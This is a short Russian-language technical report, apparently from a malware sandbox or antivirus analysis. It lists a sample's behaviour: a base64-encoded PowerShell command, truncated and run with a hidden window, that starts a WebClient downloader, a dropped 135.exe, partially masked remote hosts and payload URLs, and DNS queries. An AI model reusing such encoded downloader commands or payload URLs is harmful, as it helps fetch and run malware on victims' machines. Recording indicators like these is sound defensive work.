Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABYADAAXwA3ADIAXwBfAD0AKAAnAHcAMgAnACsAJwBfAF8AXwBfACcAKwAnADAAXwAnACkAOwAkAFMAMgAyADMAOQA0AF8APQBuAGUAdwAtAG8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAA7ACQATgA1AF8ANABfADEAXwA9AC...
- %HOMEPATH%\135.exe
- %HOMEPATH%\135.exe
- %HOMEPATH%\135.exe
- '3.#.150.35':80
- 'if#c.ru':80
- 'ap#####trical.com.au':80
- 'ap#####trical.com.au':443
- 'pk#.goog':80
- 'ak####troi-dv.ru':80
- http://if#c.ru/eKKi6q5YUC_WyPjVNX
- http://if#c.ru/site/index
- http://if#c.ru/
- http://ap#####trical.com.au/wp-content/3MdEhYTTHULOUo
- http://pk#.goog/gsr1/gsr1.crt
- http://ak####troi-dv.ru/sIs2eNw5Woa0_fc
- 'ap#####trical.com.au':443
- DNS ASK if#c.ru
- DNS ASK ap#####trical.com.au
- DNS ASK pk#.goog
- DNS ASK ma##ha.ru
- DNS ASK ak####troi-dv.ru
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABYADAAXwA3ADIAXwBfAD0AKAAnAHcAMgAnACsAJwBfAF8AXwBfACcAKwAnADAAXwAnACkAOwAkAFMAMgAyADMAOQA0AF8APQBuAGUAdwAtAG8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAA7ACQATgA1AF8ANABfADEAXwA9AC...' (со скрытым окном)